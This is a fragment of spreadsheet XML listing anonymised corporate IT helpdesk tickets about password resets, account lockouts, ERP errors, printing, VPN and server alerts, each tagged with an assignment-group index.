  <r>
    <s v="HostName_894  - status c:\  is now 88% utilized."/>
    <s v="HostName_894  - status c:\ label:sys-HostName_894 28385a7b is now 88% utilized."/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="static on call "/>
    <s v="static on call "/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="changes made for ticket inc1545346 have caused issues with delivery printing at plant_268. "/>
    <s v="changes made for ticket inc1545346 have caused issues with delivery printing at plant_268. plant_151 reconditioning facility is now located at the plant_268 facility in illinois, usa.  there were changes made to pick request printing for this group of employees but it has affected the entire facility.  the plant_268 group used to print delivery notes at the users paramdntyeter.  now all delivery notes are printing at an office printer that is not near where they are working. this is not productive. please reach out to omiwzbue auvolfhp and myself to help resolve this as soon as possible.  "/>
    <s v="khvzugxm yqfrcjwl"/>
    <x v="17"/>
  </r>
  <r>
    <s v="invalid incompletion error on so#24903890"/>
    <s v="so#35014901 has &quot;configuration&quot; incompletion for items 10-40 which is invalid. these items are complete and error should not be there"/>
    <s v="gtfdvnry nxsaqrfh"/>
    <x v="12"/>
  </r>
  <r>
    <s v="not properly acess - excel, word,skype,outlook - message &gt; products disabled to continue to use, activate now "/>
    <s v="if i try to use excel, word, skype,outlook have a message products disabled to continue to use, activate now . if i tried to do using e-mail account , i have the message : account jgnxyahz.cixzwuyf@gmail.com is not associated with the product . to active the installation , please enter the account associated with the product "/>
    <s v="jaeuqbvt orlhenfj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="downloading archiving_tool software for erp SID_34 "/>
    <s v="from: lkwspqce knxaipyj [mailto:lkwspqce.knxaipyj@gmail.com] _x000d__x000a_sent: monday, september 12, 2016 3:30 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: amar - support in installing archiving_tool to allowe me view vendor inwarehouse_tools_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_can i please have support in downloading archiving_tool software for erp SID_34 to allow me access and view vendor inwarehouse_tools._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="lkwspqce knxaipyj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hana report will not refresh - analysis buttons all deactivated - high priority"/>
    <s v="see attached workbook required to be refreshed for msc requirement."/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="8"/>
  </r>
  <r>
    <s v="please reset my erp pasword, battel to log in-username  bragtydlc, thanks"/>
    <s v="_x000a__x000a_received from: gvderpbx.udrzjxkm@gmail.com_x000a__x000a_gvderpbx udrzjxkm_x000a_junior application sales engineer_x000a_gvderpbx.udrzjxkm@gmail.com&lt;mailto:gvderpbx.udrzjxkm@gmail.com&gt;_x000a_"/>
    <s v="gvderpbx udrzjxkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="rma receiving issue with items under 1 lb.  rma 7112611859 has two items 21.5 and 4.76"/>
    <s v="name:debhyue fhyuiinch_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:yoltmegh.bmadvixs@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:rma receiving issue with items under 1 lb.  rma 7112611859 has two items 21.5 and 4.76 and when we try to receive items in under mm 7228874.  erp is doing a round up value to 5 lbs and 22 lbs.  is there a way to receive exact weight in?  _x000a_"/>
    <s v="DEsowkrH sciejzNE"/>
    <x v="17"/>
  </r>
  <r>
    <s v="please help  brianna get working again on business manager"/>
    <s v="please help  brianna get working again on business manager"/>
    <s v="eqrknylx nqpsjhwc"/>
    <x v="6"/>
  </r>
  <r>
    <s v="tnghnha ajuiegrson is in need of having access to the met lab computer to be able to perform her job."/>
    <s v="tnghnha ajuiegrson is in need of having access to the met lab computer to be able to perform her job."/>
    <s v="yjcrdmin jmizcfso"/>
    <x v="2"/>
  </r>
  <r>
    <s v="enterprise search - no results"/>
    <s v="the following objects/search connectors in enterprise search are not returning any results:_x000d__x000a_material_x000d__x000a_material bom_x000d__x000a_specification_x000d__x000a__x000d__x000a_"/>
    <s v="svlcqmnb qlwerhxt"/>
    <x v="13"/>
  </r>
  <r>
    <s v="accrual values are not matching in the compensation system"/>
    <s v="there is a bug in the performance sproc that calculates payout values. a small modification needs to occur in order to calculate payout values on a monthly basis. this was missed during uacyltoe hxgayczeing due to uacyltoe hxgayczeing taking place in the first period of a financial_toolcal year. this issue only arises in subsequent periods."/>
    <s v="aofextgk tugywidl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="password reset "/>
    <s v="password reset "/>
    <s v="cbmryjid nkcmvwgi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to create delivery for sto 5019168696/4908100506"/>
    <s v="not able to create delivery for sto 5019168696/4908100506 - _x000d__x000a_could you please verify apo ? _x000d__x000a_please assing to supply_chain group _x000d__x000a_"/>
    <s v="jaeuqbvt orlhenfj"/>
    <x v="29"/>
  </r>
  <r>
    <s v="skype sound not working."/>
    <s v="skype sound not working._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-installed the sound drivers._x000d__x000a_-restarted the pc._x000d__x000a_-gave a uacyltoe hxgaycze call, user able to hear  sound clearly._x000d__x000a_-issue resolved."/>
    <s v="gcaktshf kpgfrotd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1343 failed in job_scheduler at: 09/12/2016 13:22:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1343 failed in job_scheduler at: 09/12/2016 13:22:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="xeucniqa dwpsevof"/>
    <x v="0"/>
  </r>
  <r>
    <s v="tax not calculated "/>
    <s v="from: raghyvhdra najuty _x000d__x000a_sent: monday, september 12, 2016 6:33 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_cc: srinfhyath araghtyu; parthyrubhji erathyur_x000d__x000a_subject: trurthyuft - re: tax not calculated_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please note  material has reached along with  excise inwarehouse_tool without vat w.r.t  to inwarehouse_tools  _x000d__x000a__x000d__x000a_1) 0512673537 dt.31.08.2016_x000d__x000a_2) 0512669241 dt 22.08.2016_x000d__x000a_3) 0512673538 dt 22.08.2016_x000d__x000a_"/>
    <s v="ikerxqwz prkyuitl"/>
    <x v="12"/>
  </r>
  <r>
    <s v="need to configure emails on the company iphone device"/>
    <s v="need to configure emails on the company iphone device"/>
    <s v="insbceoa czgpyrtb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp queries"/>
    <s v="erp queries"/>
    <s v="esuizcrh nytvhmbq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlocked erp SID_34 "/>
    <s v="unlocked erp SID_34 "/>
    <s v="slrgconp onukdesq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need full control access to \\HostName_768\teams\consigned inventory"/>
    <s v="need full control access to \\HostName_768\teams\consigned inventory"/>
    <s v="ncuwyeib plnzhxvc"/>
    <x v="33"/>
  </r>
  <r>
    <s v="unable to end out an email"/>
    <s v="emailed some steps, awaiting uacyltoe hxgayczeing._x000a__x000a_from: nwfodmhc exurcwkm _x000a_sent: monday, september 12, 2016 8:22 pm_x000a_to: shhkioaprhkuoash ms &lt;peuckbvr.tjihmgsv@gmail.com&gt;_x000a_subject: fw: fw: fw: engineering_drawing_tool automation_x000a__x000a_hi shiv,_x000a__x000a_please see if removing the names from your outlook cache fixes the issue._x000a_to do this please type the name of the recipient, you will find a 'x' next to the name. click on it to remove from the cache. open a new email and type out the complete email address and uacyltoe hxgaycze if you are able to send the email._x000a__x000a_ _x000a__x000a_"/>
    <s v="peuckbvr tjihmgsv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i am having issues delivering parts to stock in another plant. the rqfhiong zkwfqagb has deliver plant of plant_36"/>
    <s v="i am having issues delivering parts to stock in another plant. the rqfhiong zkwfqagb has deliver plant of plant_36 but it will not deliver there._x000a__x000a_ext.2296_x000a_summary:i am having issues delivering parts to stock in another plant. the rqfhiong zkwfqagb has deliver plant of plant_36 but it will not deliver there."/>
    <s v="ulmctsvi lbvrdika"/>
    <x v="44"/>
  </r>
  <r>
    <s v="could not hear user from other side."/>
    <s v="could not hear user from other side._x000d__x000a_phone issue."/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="users are unable to connect to the network drives in HostName_1274"/>
    <s v="users are unable to connect to the network drives in HostName_1274, the server is also not reachable."/>
    <s v="bdeplqyj fewovrcq"/>
    <x v="11"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="from: puxsvfwr cwkjruni _x000d__x000a_sent: monday, september 12, 2016 12:23 pm_x000d__x000a_to: nwfodmhc exurcwkm &lt;nwfodmhc.exurcwkm@gmail.com&gt;_x000d__x000a_subject: sab: wg: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird._x000d__x000a_importance: high_x000d__x000a__x000d__x000a__x000d__x000a_hi can you please activate my mobile devise to recieve emails on my new business iphone._x000d__x000a__x000d__x000a_"/>
    <s v="puxsvfwr cwkjruni"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2063c failed in job_scheduler at: 09/12/2016 10:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2063c failed in job_scheduler at: 09/12/2016 10:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="yzbqwpat fdjrctbu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="mobile device activation "/>
    <s v="mobile device activation "/>
    <s v="feiozqbd uwljchaf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect wireless on the laptop"/>
    <s v="unable to connect wireless on the laptop"/>
    <s v="nouivdea boiypjvx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent : with reference to ticket : inc1549876 "/>
    <s v="uyjlodhq ymedkatw (lghuiezj3) has mapped the units m (departments), n (public) and s (teams) to HostName_614 incorrectly._x000a__x000a_helped her mapping network drive to correctly : inc1549876 _x000a_but after reboot computer is connecting back to kkbsm003 instead of HostName_622_x000a__x000a_she should have access m drive n drive and s drive with this server  HostName_622_x000a_pc name: ekxw8111221_x000a__x000a_please help update login script for user jÃ©sica lÃ³pez rufo._x000a__x000a_also, user requested to process this request as soon as possible  as her daily work is getting hampered and its very urgent for her._x000a_"/>
    <s v="cxqldoub vkgpatsu"/>
    <x v="38"/>
  </r>
  <r>
    <s v="vpn access pc name : aidl8912285  user id : thhyuokhkp"/>
    <s v="vpn access pc name : aidl8912285 "/>
    <s v="yzbqwpat fdjrctbu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="out of office for at least next 3 months. need  password reset for the mails."/>
    <s v="out of office for at least next 3 months. need  password reset for the mails."/>
    <s v="yawbtfjc krypjxnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not loading"/>
    <s v="outlook not loading"/>
    <s v="dqplrwoy cutpwjie"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no response from other side : german call "/>
    <s v="no response from other side : german call "/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="removing another mail box from outlook"/>
    <s v="removing another mail box from outlook"/>
    <s v="rwhavckz drvxyihj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="unable to login to skype"/>
    <s v="wpgxtnks opizcfle"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp help"/>
    <s v="_x000d__x000a__x000d__x000a_received from: anpocezt.qturbxsg@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a_when i try to get on to erp search and explorer analytics a blank screen comes up (below) are we having problems_x000d__x000a_"/>
    <s v="anpocezt qturbxsg"/>
    <x v="8"/>
  </r>
  <r>
    <s v="need to contact keyhtyvin toriaytun"/>
    <s v="need to contact keyhtyvin toriaytun"/>
    <s v="ltqhgdbf qtgprmsh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="bdgklrnj phwmkldy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp customer ref not on delivery"/>
    <s v="hoi,_x000d__x000a__x000d__x000a_view attached 2 examples where the customer ref as entered in erp is not printing on delivery's for 1207 sales org. also printscreen from order wikfnmlwds wmtiruac attached._x000d__x000a__x000d__x000a_this might also be the case in other sales org's. please also check 1202 , 1206 , 1225, 1227, 1241, 1278_x000d__x000a__x000d__x000a_"/>
    <s v="ugtzkvps crnmtjsv"/>
    <x v="12"/>
  </r>
  <r>
    <s v="please set field services collaboration_platform page to include collaboration_platform meeting section as you had explained"/>
    <s v="please set field services collaboration_platform page to include collaboration_platform meeting section as you had explained"/>
    <s v="glnfyoqe fexlisau"/>
    <x v="15"/>
  </r>
  <r>
    <s v="password manager error , failed to log-inn. now i'm blocked , please reset"/>
    <s v="my phone : "/>
    <s v="kzbrimwx dconpwbu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the printout of shipament lable is not working"/>
    <s v="name:frafhyuo ajuyanni_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:dmqjhrso.gzbunwie@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:hello, i'm frafhyuo ajuyanni from company italy._x000a_when i try to create a delivery (pweaver/ship) the printout of shipament lable is not working. for the italian shipmet works.. for others countries, is not working. can you please give me support?"/>
    <s v="dmqjhrso gzbunwie"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no response from other side."/>
    <s v="no response from other side."/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="follow up call : inplant_859346"/>
    <s v="follow up call : inplant_859346"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wifi in r&amp;d conference room"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gdkiehbr.kdithjsr@gmail.com_x000d__x000a__x000d__x000a_please investigate and repair the cause of the weak wifi signal in the r&amp;d area. we used to have full bars and for some reason it is barley 2 bars._x000d__x000a_"/>
    <s v="gdkiehbr kdithjsr"/>
    <x v="3"/>
  </r>
  <r>
    <s v="dual monitor issue "/>
    <s v="dual monitor issue"/>
    <s v="myzprshf ojvgdcwb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need interaction password reset"/>
    <s v="need interaction password reset_x000a__x000a_phone: "/>
    <s v="nqdyowsm yqerwtna"/>
    <x v="6"/>
  </r>
  <r>
    <s v="password_management_tool password manager : password reset help and query"/>
    <s v="password_management_tool password manager : password reset help and query"/>
    <s v="xjyuobma pzgqixlj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bei drucker em98 papiertransport defekt"/>
    <s v="beim transport des druckerpapiers treten in regelmÃ¤ÃŸigen abstÃ¤nden einkerbungen auf. papiereinzug defekt? "/>
    <s v="tczxaubk aupnwqoi"/>
    <x v="41"/>
  </r>
  <r>
    <s v="unable to log in to the mii system "/>
    <s v="unable to log in to the mii system _x000d__x000a__x000d__x000a_user authentication failed"/>
    <s v="gcdptqae angojbil"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i.t. issue"/>
    <s v="_x000a__x000a_received from: zwirhcol.narzlmfw@gmail.com_x000a__x000a_usa has no functioning ups systems.  all switches/servers are plugged into the wall.  please ship two aerp._x000a__x000a_j. shrugott tyhuellis_x000a_usa facilities mgr._x000a_zwirhcol.narzlmfw@gmail.com&lt;mailto:zwirhcol.narzlmfw@gmail.com&gt;_x000a_"/>
    <s v="zwirhcol narzlmfw"/>
    <x v="2"/>
  </r>
  <r>
    <s v="reset passwords for robhyertyj f duca using password_management_tool password reset."/>
    <s v="the"/>
    <s v="acteiqdu bferalus"/>
    <x v="16"/>
  </r>
  <r>
    <s v="outlook not launching"/>
    <s v="outlook not launching"/>
    <s v="zylaexnv pvkzbduh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="missing data in bex productmanagement - urgent !!!!!!!!!!!!!!!!!!!!!!"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uwofavej.hxyatnjc@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_data are dierppearing in bex from productmanagement master._x000d__x000a__x000d__x000a_we found the reason: anybody has changed the key figure name from &quot;sales revenue&quot; to &quot;total sales revenue&quot;._x000d__x000a_in addition, there is a new key figure: net value_x000d__x000a__x000d__x000a_nobody is informed about the change and the different (?)  content of the two key figures._x000d__x000a__x000d__x000a_you immediately need to change back, all the reports wonÂ´t work now_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="uwofavej hxyatnjc"/>
    <x v="8"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="pschzfog hbzvkqjd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook issue."/>
    <s v="_x000d__x000a__x000d__x000a_received from: iqmhjlwr.jqmxaybi@gmail.com_x000d__x000a__x000d__x000a_hello guys,_x000d__x000a__x000d__x000a_please can you help, i was advised to change passwords on password_management_tool manager and since i have done this i have had a delay on my e-mails as per the below screenshot._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d20cff.209d01c0]_x000d__x000a__x000d__x000a_"/>
    <s v="iqmhjlwr jqmxaybi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="active directory locked."/>
    <s v="active directory locked."/>
    <s v="kifmqeph srlzgbhw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activated."/>
    <s v="mobile device activated."/>
    <s v="ayktfvjr soghziec"/>
    <x v="0"/>
  </r>
  <r>
    <s v="in correct tax    rate  in inwarehouse_tools "/>
    <s v="_x000d__x000a__x000d__x000a_received from: ikerxqwz.prkyuitl@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_after implementation  of updation  of tax  rate   through system   , we have come across  instances wherein the system is capturing  different   tax rate  for local  sales  (within karnataka)  other than one  recommended ._x000d__x000a__x000d__x000a_in this connection attaching herewith    mail communication from   team ._x000d__x000a__x000d__x000a_request you to look into this  aspect  as it is resulting into non-compliance_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ikerxqwz prkyuitl"/>
    <x v="9"/>
  </r>
  <r>
    <s v="contractor locked out: please unlock vvlahstyurr in ad and erp SID_60"/>
    <s v="a student  is working on a project with vinhytry, and has reported that her passwords are no longer working to access data.  my assumption is that she got her passwords mixed up between ad and hana SID_60, and is locked out of one or both; please have a look at unlocking her account."/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="52"/>
  </r>
  <r>
    <s v="need to log into skype for business"/>
    <s v="cannot access skype for business with my login credentials."/>
    <s v="jslqdgka clfrodny"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp crm - instatnt timeout"/>
    <s v="user: fywphaxc.jacdqbks@gmail.com;_x000d__x000a_issue: user's session instantly kirtyled - timeout error as per attached screen._x000d__x000a_"/>
    <s v="fywphaxc jacdqbks"/>
    <x v="14"/>
  </r>
  <r>
    <s v="access to vpn"/>
    <s v="added user to the f5 employee group. ryafbthn will uacyltoe hxgaycze and call in if he has any issues."/>
    <s v="yalntgcz vaqjknsw"/>
    <x v="33"/>
  </r>
  <r>
    <s v="passwÃ¶rter wothyehre"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dgwrmsja.jzlpwuit@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_bitte fÃ¼r wothyehre die passwÃ¶rter fÃ¼r windows und erp freimachen!_x000d__x000a__x000d__x000a_danke_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen/best "/>
    <s v="dgwrmsja jzlpwuit"/>
    <x v="0"/>
  </r>
  <r>
    <s v="computer doesn't work"/>
    <s v="computer starts, but keybankrd and mouse don't work. impossible login. cables and connections ok (keybankrd and mouse lights on)."/>
    <s v="fegahzqx bkeqfvpl"/>
    <x v="62"/>
  </r>
  <r>
    <s v="bobj explorer info spaces load issue (email sent to basis and dac team)"/>
    <s v="hi team basis, team dac,_x000d__x000a__x000d__x000a_please investigate the bobj explorer services are up and running. it is showing blank screen at the moment._x000d__x000a__x000d__x000a_i have re indexed all the information spaces. but it did not help._x000d__x000a__x000d__x000a_please assist at an earliest._x000d__x000a__x000d__x000a_i will create a ticket in few minutes and update here._x000d__x000a__x000d__x000a_"/>
    <s v="sholvcmf bjtpomrl"/>
    <x v="13"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="unhweist ednkuigf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked"/>
    <s v="account locked"/>
    <s v="zpsoifea wvhilrpz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp issue with batches"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bswlorek.yhdrlgbs@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_erp does not create to's automatically because of the following error message:_x000d__x000a_[cid:image001.png@01d20cf1.36053bd0]_x000d__x000a__x000d__x000a_"/>
    <s v="bswlorek yhdrlgbs"/>
    <x v="17"/>
  </r>
  <r>
    <s v="when entering the proven solution ps-16-939 under &quot;the page cannot be foun"/>
    <s v="would you please delete the solution so that i can upload it again? "/>
    <s v="qfwnbutk jtenbvkq"/>
    <x v="25"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="kxoezpwm wthpabcq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bitte konten  erzeugen"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ughzilfm.cfibdamq@gmail.com_x000d__x000a__x000d__x000a_hallo ,_x000d__x000a__x000d__x000a_bitte k1 konten  erzeugen ._x000d__x000a__x000d__x000a_referenz  user : twdyzsfr gjedmfvh_x000d__x000a__x000d__x000a_auftraggeber : scedxqur pocxqtrl_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="scedxqur pocxqtrl"/>
    <x v="33"/>
  </r>
  <r>
    <s v="hzptilsw wusdajqv : log on balancing error for SID_1 and SID_21"/>
    <s v="hzptilsw wusdajqv : log on balancing error for SID_1 and SID_21"/>
    <s v="ipwjorsc uboapexr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lhbsm005: disk free on f:\ is now 3 % which is below warning threshold of 15%. "/>
    <s v="lhbsm005: disk free on f:\ is now 3 % which is below warning threshold of 15%. "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="bitte die schreib / leseberechtigung  fÃ¼r ordner m:staebefertigung einrichten."/>
    <s v="guten morgen,_x000d__x000a__x000d__x000a_bitte die schreib / leseberechtigung  fÃ¼r ordner m:staebefertigung einrichten._x000d__x000a__x000d__x000a_danke_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_freundliche grÃ¼ÃŸe / kind "/>
    <s v="htvepyua izgulrcf"/>
    <x v="24"/>
  </r>
  <r>
    <s v="revert the change done for chg0032720"/>
    <s v="revert the change done for chg1143831 please find the attachment for the issue that users are facing."/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="search and explorer analytics issue"/>
    <s v="search and explorer analytics issue is blank in bobj. can login to search and analytics from ess but no search list is available._x000a__x000a_phone: "/>
    <s v="fbuacglh nvreldkt"/>
    <x v="48"/>
  </r>
  <r>
    <s v="tess application doesn't run"/>
    <s v="good morning, when i double click on the tess icon on my desktop, starts the initial loading page, but after few seconds the application close itself and the programdnty doesn't run. many "/>
    <s v="izohnpaq jtolembh"/>
    <x v="66"/>
  </r>
  <r>
    <s v="bobj "/>
    <s v="_x000d__x000a__x000d__x000a_received from: ctzykflo.evzbhgru@gmail.com_x000d__x000a__x000d__x000a_dear all,_x000d__x000a__x000d__x000a_can someone please check and fix the problem._x000d__x000a__x000d__x000a_sales reps reported that the reports are not available in bobj._x000d__x000a__x000d__x000a_i checked too and also get the error message._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d20ce6.35220981]_x000d__x000a__x000d__x000a_"/>
    <s v="ctzykflo evzbhgru"/>
    <x v="8"/>
  </r>
  <r>
    <s v="windows account locked"/>
    <s v="good day._x000d__x000a__x000d__x000a_please unlock users windows account."/>
    <s v="oslzvpgk nhwsxgpb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="local availability and pricing information missing on various &quot;obsolete&quot; products (see screenshot)"/>
    <s v="local availability and pricing information missing on various &quot;obsolete&quot; products (see screenshot)"/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="20"/>
  </r>
  <r>
    <s v="unable to turn on the computer."/>
    <s v="unable to turn on the computer."/>
    <s v="voprdmae ivrgdmao"/>
    <x v="0"/>
  </r>
  <r>
    <s v="po display by vendor - not proper"/>
    <s v="po display by vendor is showing only pending po's._x000d__x000a_if selection paramdntyeter is selected as we101 -  it was showing only pending po;s_x000d__x000a_if selection paramdntyeter is kept as blank - it was showing complete po's done on that vendor."/>
    <s v="mnrgpfqh mblavfti"/>
    <x v="29"/>
  </r>
  <r>
    <s v="private address fields are enabled on employee master crm ui"/>
    <s v="disable private address fields, new &amp; edit buttons on employee master crm ui"/>
    <s v="tavsikpl dcrkwuny"/>
    <x v="14"/>
  </r>
  <r>
    <s v="HostName_1178 is not responding since at 1:30 am et on 09/12"/>
    <s v="HostName_1178 is not responding since at 1:30 am et on 09/12"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="11"/>
  </r>
  <r>
    <s v="please add new user to company ru and nm - nghyuakm"/>
    <s v="please add new user to company ru and nm - nghyuakm_x000a_install phone and headset as well._x000a__x000a_"/>
    <s v="esguiazn pqdjtzin"/>
    <x v="6"/>
  </r>
  <r>
    <s v="aqzcisjy raflghneib : account disabled."/>
    <s v="aqzcisjy raflghneib : account disabled."/>
    <s v="aorthyme rnsuipbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset collaboration_platform problem"/>
    <s v="_x000d__x000a__x000d__x000a_received from: sbgvrncj.idfhtoqv@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i changed my passwords this morning with password manager but i am having problems synching my collaboration_platform on collaboration_platform, it keeps asking me to enter the new password again and again._x000d__x000a_the rest, including office365 on both the workstation and the mobile are working ok with the new password. just collaboration_platform is having a problem._x000d__x000a_any suggestions?_x000d__x000a__x000d__x000a_[cid:image001.png@01d20cde.40cc4e90]_x000d__x000a_many "/>
    <s v="sbgvrncj idfhtoqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to take prints &amp; scan with new laptop"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dwujlnhs.ecxvrpyl@gmail.com_x000d__x000a__x000d__x000a_dear sir_x000d__x000a__x000d__x000a_i have received new laptop dell latitude e5470, with which i am unable to take printouts and scan from office printer._x000d__x000a_kindly help in resolving the issue._x000d__x000a__x000d__x000a_best "/>
    <s v="dwujlnhs ecxvrpyl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="help reset erp SID_37 bw production account password --xighjacj."/>
    <s v="erp SID_37 bw production account password  changed failed in password_management_tool system . erp bex can not login now ._x000d__x000a_user id : xighjacj_x000d__x000a__x000d__x000a_received from: smktofel.etsoirbw@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please help on my issue below._x000d__x000a_[cid:image001.png@01d20d0a.f4495281]_x000d__x000a__x000d__x000a_[cid:image002.png@01d20d0a.f4495281]_x000d__x000a__x000d__x000a_"/>
    <s v="smktofel etsoirbw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error druing password change."/>
    <s v="_x000d__x000a__x000d__x000a_received from: fjnmxoya.iljgptas@gmail.com_x000d__x000a__x000d__x000a_hi i got the below message during password change. kindly help._x000d__x000a__x000d__x000a_[cid:2989156a-79bb-43c1-96e5-47e5ee747c69]_x000d__x000a__x000d__x000a_ with "/>
    <s v="fjnmxoya iljgptas"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ooo - till 4 oct 2016 it problem - engineering tool offline version is not starting"/>
    <s v="_x000d__x000a__x000d__x000a_received from: mikhghytr.sperhake@company.com_x000d__x000a__x000d__x000a_win7 64bit_x000d__x000a_dell m4700_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="qvncizuf ueiybanz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_481 failed in job_scheduler at: 09/12/2016 03:46:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_9/12/2016 1:03:21 am :: error: vm 'HostName_1045' (ref: 'vm-232341') is 'disconnected' _x000d__x000a__x000d__x000a_job Job_481 failed in job_scheduler at: 09/12/2016 03:46:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="der rechner von unseren schichtfÃ¼hrern h.gabryltk, h.byczkowski, h.stankewitz ist defekt."/>
    <s v="hallo _x000d__x000a__x000d__x000a_der rechner von unseren schichtfÃ¼hrern h.gabryltk, h.byczkowski, h.stankewitz ist defekt._x000d__x000a_kannst du bitte mal vorbeikommen._x000d__x000a_"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="rechner fÃ¼r messvorrichtung steli funktioniert nicht \zedlet"/>
    <s v="rechner fÃ¼r messvorrichtung steli funktioniert nicht \zedlet"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
